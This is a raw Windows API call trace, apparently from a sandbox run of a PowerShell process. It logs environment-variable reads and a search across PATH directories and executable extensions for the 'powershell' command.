	[0305.398] CoTaskMemFree (pv=0x4aeab0) 
	[0305.400] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0305.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.400] CoTaskMemFree (pv=0x4aeab0) 
	[0305.404] VirtualQuery (in: lpAddress=0x1c8cdc70, lpBuffer=0x1c8ceb30, dwLength=0x30 | out: lpBuffer=0x1c8ceb30*(BaseAddress=0x1c8cd000, AllocationBase=0x1bf40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.310] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0306.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.310] CoTaskMemFree (pv=0x4aeab0) 
	[0306.312] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0306.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.312] CoTaskMemFree (pv=0x4aeab0) 
	[0306.313] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0306.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.313] CoTaskMemFree (pv=0x4aeab0) 
	[0306.314] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0306.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.314] CoTaskMemFree (pv=0x4aeab0) 
	[0306.318] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0306.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.318] CoTaskMemFree (pv=0x4aeab0) 
	[0307.191] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0307.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.191] CoTaskMemFree (pv=0x4aeab0) 
	[0307.194] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0307.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.194] CoTaskMemFree (pv=0x4aeab0) 
	[0307.195] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0307.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.195] CoTaskMemFree (pv=0x4aeab0) 
	[0307.200] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0307.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.200] CoTaskMemFree (pv=0x4aeab0) 
	[0307.202] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0307.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.202] CoTaskMemFree (pv=0x4aeab0) 
	[0307.203] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0307.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.203] CoTaskMemFree (pv=0x4aeab0) 
	[0307.205] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0307.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.205] CoTaskMemFree (pv=0x4aeab0) 
	[0307.222] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0307.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.222] CoTaskMemFree (pv=0x4aeab0) 
	[0311.619] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0311.619] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0311.619] CoTaskMemFree (pv=0x4aeab0) 
	[0312.770] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0312.770] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0312.771] CoTaskMemFree (pv=0x4aeab0) 
	[0312.771] CoTaskMemAlloc (cb=0x128) returned 0x1b7a1f00
	[0312.771] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7a1f00, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0312.771] CoTaskMemFree (pv=0x1b7a1f00) 
	[0315.719] CoTaskMemAlloc (cb=0x20e) returned 0x1b7785e0
	[0315.719] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7785e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0315.719] CoTaskMemFree (pv=0x1b7785e0) 
	[0316.187] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0316.188] SetErrorMode (uMode=0x1) returned 0x1
	[0316.191] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.863] SetErrorMode (uMode=0x1) returned 0x1
	[0324.266] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.266] SetErrorMode (uMode=0x1) returned 0x1
	[0324.266] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.275] SetErrorMode (uMode=0x1) returned 0x1
	[0324.276] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.276] SetErrorMode (uMode=0x1) returned 0x1
	[0324.276] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.284] SetErrorMode (uMode=0x1) returned 0x1
	[0324.286] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.286] SetErrorMode (uMode=0x1) returned 0x1
	[0324.286] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.294] SetErrorMode (uMode=0x1) returned 0x1
	[0324.295] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.296] SetErrorMode (uMode=0x1) returned 0x1
	[0324.296] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.069] SetErrorMode (uMode=0x1) returned 0x1
	[0325.070] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.070] SetErrorMode (uMode=0x1) returned 0x1
	[0325.070] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.078] SetErrorMode (uMode=0x1) returned 0x1
	[0325.080] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.080] SetErrorMode (uMode=0x1) returned 0x1
	[0325.080] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.088] SetErrorMode (uMode=0x1) returned 0x1
	[0325.090] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.090] SetErrorMode (uMode=0x1) returned 0x1
	[0325.090] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.098] SetErrorMode (uMode=0x1) returned 0x1
	[0325.100] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.100] SetErrorMode (uMode=0x1) returned 0x1
	[0325.100] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.031] SetErrorMode (uMode=0x1) returned 0x1
	[0326.032] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.032] SetErrorMode (uMode=0x1) returned 0x1
	[0326.032] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.048] SetErrorMode (uMode=0x1) returned 0x1
	[0326.049] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.049] SetErrorMode (uMode=0x1) returned 0x1
	[0326.049] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.057] SetErrorMode (uMode=0x1) returned 0x1
	[0326.059] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.059] SetErrorMode (uMode=0x1) returned 0x1
	[0326.059] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.067] SetErrorMode (uMode=0x1) returned 0x1
	[0326.069] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.069] SetErrorMode (uMode=0x1) returned 0x1
	[0326.069] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.967] SetErrorMode (uMode=0x1) returned 0x1
	[0326.969] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.969] SetErrorMode (uMode=0x1) returned 0x1
	[0326.969] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.977] SetErrorMode (uMode=0x1) returned 0x1
	[0326.978] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.978] SetErrorMode (uMode=0x1) returned 0x1
	[0326.978] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.987] SetErrorMode (uMode=0x1) returned 0x1
	[0326.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.988] SetErrorMode (uMode=0x1) returned 0x1
	[0326.988] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.988] SetErrorMode (uMode=0x1) returned 0x1
	[0326.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.989] SetErrorMode (uMode=0x1) returned 0x1
	[0326.989] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.989] SetErrorMode (uMode=0x1) returned 0x1
	[0326.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.989] SetErrorMode (uMode=0x1) returned 0x1
	[0326.990] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.990] SetErrorMode (uMode=0x1) returned 0x1
	[0326.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.990] SetErrorMode (uMode=0x1) returned 0x1
	[0326.990] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.990] SetErrorMode (uMode=0x1) returned 0x1
	[0326.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.991] SetErrorMode (uMode=0x1) returned 0x1
	[0326.991] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.991] SetErrorMode (uMode=0x1) returned 0x1
	[0326.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.991] SetErrorMode (uMode=0x1) returned 0x1
	[0326.991] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.992] SetErrorMode (uMode=0x1) returned 0x1
	[0326.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.992] SetErrorMode (uMode=0x1) returned 0x1
	[0326.992] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.992] SetErrorMode (uMode=0x1) returned 0x1
